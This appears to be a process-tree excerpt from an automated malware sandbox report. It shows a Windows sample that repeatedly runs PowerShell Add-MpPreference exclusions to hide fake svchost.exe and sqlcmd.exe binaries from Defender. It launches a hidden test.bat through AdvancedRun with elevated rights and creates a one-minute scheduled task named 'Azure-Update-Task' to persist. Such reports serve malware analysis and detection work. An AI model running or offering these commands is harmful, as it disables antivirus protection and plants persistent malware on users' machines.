- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7232
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6104
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5200
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4316
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6000
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4308
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6184
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7900
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7800
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7908
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5740
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6020
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7824
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4336
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6860
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6848
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:8132
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7492
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3476
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2388
- - C:\Users\Admin\AppData\Local\Temp\a0f962bc-e445-4d69-bbb5-84816bc9c40a\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\a0f962bc-e445-4d69-bbb5-84816bc9c40a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a0f962bc-e445-4d69-bbb5-84816bc9c40a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:1424
  - - C:\Users\Admin\AppData\Local\Temp\a0f962bc-e445-4d69-bbb5-84816bc9c40a\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\a0f962bc-e445-4d69-bbb5-84816bc9c40a\AdvancedRun.exe" /SpecialRun 4101d8 1424
      4⤵
      PID:4196
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7548
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:4832
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:1896
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:4312
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:7696
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5904
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6220
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7776
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5972
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4900
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4172
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5272
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5608
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7612
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7704
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4700
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:3796
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7008
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7196
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5212
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:920
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6284
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6264
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6448
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7544
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8180
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6652
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:4888
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5244
- - C:\Users\Admin\AppData\Local\Temp\c4705abb-f65c-462e-8ef9-639780ac7f15\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\c4705abb-f65c-462e-8ef9-639780ac7f15\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c4705abb-f65c-462e-8ef9-639780ac7f15\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:3316
  - - C:\Users\Admin\AppData\Local\Temp\c4705abb-f65c-462e-8ef9-639780ac7f15\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\c4705abb-f65c-462e-8ef9-639780ac7f15\AdvancedRun.exe" /SpecialRun 4101d8 3316
      4⤵
      PID:2192
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6912
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    PID:4348
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
      4⤵
      Creates scheduled task(s)
      PID:7656
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:7796
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7496
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7556
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3456
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6168
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6028
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:7976
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6232
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7092
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6496
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:7896
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6324
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5988
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:6452
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8000
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:928
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:4304
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:8144
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:188
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6664
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:5220
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5216
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:332
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3460
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:3192
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:6836
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe" -Force
    3⤵
    PID:792
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\e5d2Ppf1e31Wex1e0V\svchost.exe" -Force
    3⤵
    PID:5800
- - C:\Users\Admin\AppData\Local\Temp\aa1f83fe-ca7e-4abb-bd28-8a4f0396fa4a\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\aa1f83fe-ca7e-4abb-bd28-8a4f0396fa4a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\aa1f83fe-ca7e-4abb-bd28-8a4f0396fa4a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:7392
  - - C:\Users\Admin\AppData\Local\Temp\aa1f83fe-ca7e-4abb-bd28-8a4f0396fa4a\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\aa1f83fe-ca7e-4abb-bd28-8a4f0396fa4a\AdvancedRun.exe" /SpecialRun 4101d8 7392
      4⤵
      PID:5128
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
